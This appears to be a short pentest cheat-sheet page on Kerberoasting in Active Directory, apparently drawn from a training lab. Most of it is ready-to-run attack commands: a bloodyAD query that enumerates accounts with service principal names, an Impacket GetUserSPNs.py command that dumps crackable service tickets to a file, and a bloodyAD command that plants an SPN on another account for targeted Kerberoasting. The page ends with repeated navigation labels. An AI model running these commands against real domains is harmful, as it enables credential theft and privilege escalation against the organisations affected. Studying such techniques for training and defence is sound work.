Kerberoasting

List kerberoastable users

bash

bloodyAD -u studentuser19 -d us.techcorp.local -p password --host 192.168.1.2 get search --filter '(servicePrincipalName=*)' --attr distinguishedName --base CN=Users,DC=us,DC=techcorp,DC=local

Kerberoast all accounts

bash

GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip KeyDistributionCenter 'DOMAIN/USER:Password'

Targeted Kerberoasting

If an attacker controls an account with the rights to add an SPN to another (GenericAll, GenericWrite), it can be abused to make that other account vulnerable to Kerberoast.

bash

bloodyAD -u studentuser19 -d us.techcorp.local -p password --host 192.168.1.2 set object "Support19User" servicePrincipalName -v "US/support19userSPN"

WARNING

the new SPN should be unique in the domain

Enumeration

Lateral Movement

Kerberos

Wireguard

Kerberoasting

Targeted Kerberoasting

Kerberos

Kerberoasting ​

Targeted Kerberoasting ​

Kerberoasting

Targeted Kerberoasting